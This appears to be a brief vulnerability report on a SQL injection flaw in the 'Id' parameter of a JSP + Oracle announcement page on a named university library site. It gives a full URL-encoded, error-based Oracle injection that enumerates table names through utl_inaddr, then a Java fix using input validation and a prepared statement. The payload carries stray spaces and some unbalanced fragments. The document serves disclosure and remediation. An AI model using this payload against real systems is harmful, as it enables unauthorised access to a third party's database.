Brief description: JSP + ORACLE
Http://www.lib.tsinghua.edu.cn/homepage/announce_view.jsp? Id = 2217% 27 + or + 1% 3Dutl_inaddr.get_host_address % 28% 28% 28 select + distinct + chr % 28126% 29% 7C % 7 Cchr % 2839% 29% 7C % 7 Ccast % 28table_name + as + char % 2850% 29% 29% 7C % 7 Cchr % 2839% 29% 7C % 7 Cchr % 28126% 29 + from + % 28 select + distinct + rownum + r % 2Ctable_name + from + all_tables + where + owner <> chr % 2883% 29% 7C % 7 Cchr % 2889% 29% 7C % 7 Cchr % 2883% 29 + and + owner + <> chr % 2883% 29% 7C % 7 Cchr % 2889% 7C % 7 Cchr % 2883% 29% 7C % 7 Cchr % 2884% 29% 7C % 7 Cchr % 2869% 29% 7C % 7 Cchr % 2877% 29 + and + owner <> chr % 2867% 29% 7C % 7 Cchr % 2884% 29% 7C % 7 Cchr % 2888% 29% 7C % 7 Cchr % 2883% 29% 7C % 7 Cchr % 2889% 29% 7C % 7 Cchr % 2883% 29 + and + owner <> chr % 2887% 29% 7C % 7 Cchr % 2877% 29% 7C % 7 Cchr % 2883% 7C % 7 Cchr % 29% 2889% 7C % 7 Cchr % 29% 29 + and + owner <> chr % 2883% 2877% 7C % 7 cchr % 2868% 29% 7C % 7 Cchr % 2883% 29% 7C % 7 Cchr % 2889% 29% 7C % 7 Cchr % 2883% 29 + and + owner <> chr % 2879% 29% 7C % 7 Cchr % 2876% 29% 7C % 7 Cchr % 2865% 29% 7C % 7 Cchr % 2880% 29% 7C % 7 Cchr % 2883% 29% 7C % 7 Cchr % 2889% 29% 7C % 7 Cchr % 2883% 29 where + r % 3D21% 29% 29% 29 + and + % 271% 27% 3D % 271
Proof of vulnerability:
Fix: Filter
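One way to implement the filtering fix for the numeric `Id` parameter of a JSP + Oracle page, as an added example that is not the site's own code. The class name, the `announce` table and its `title` and `id` columns are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.OptionalLong;
import java.util.regex.Pattern;

public class AnnouncementLookup {
    // Id is a numeric key: accept 1 to 10 ASCII digits and nothing else.
    private static final Pattern ID = Pattern.compile("[0-9]{1,10}");

    /** Returns the id, or empty when the URL-decoded parameter is not a plain number. */
    static OptionalLong parseId(String raw) {
        if (raw == null || !ID.matcher(raw).matches()) {
            return OptionalLong.empty();
        }
        return OptionalLong.of(Long.parseLong(raw));
    }

    /** Hypothetical table and column names; the value is bound, never concatenated into the SQL. */
    static String loadTitle(Connection db, long id) throws SQLException {
        String sql = "SELECT title FROM announce WHERE id = ?";
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setLong(1, id);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal id, a shortened form of the quote-and-OR
        // pattern seen in the report, an empty value, and a value with a space.
        String[] samples = { "2217", "2217' or 1=1 and '1'='1", "", "22 17" };
        for (String s : samples) {
            String verdict = parseId(s).isPresent() ? "accepted" : "rejected (HTTP 400)";
            System.out.println("[" + s + "] -> " + verdict);
        }
    }
}
```

The request in this report reads data back through an Oracle error message, so the JSP should also return a generic error page rather than the database error text.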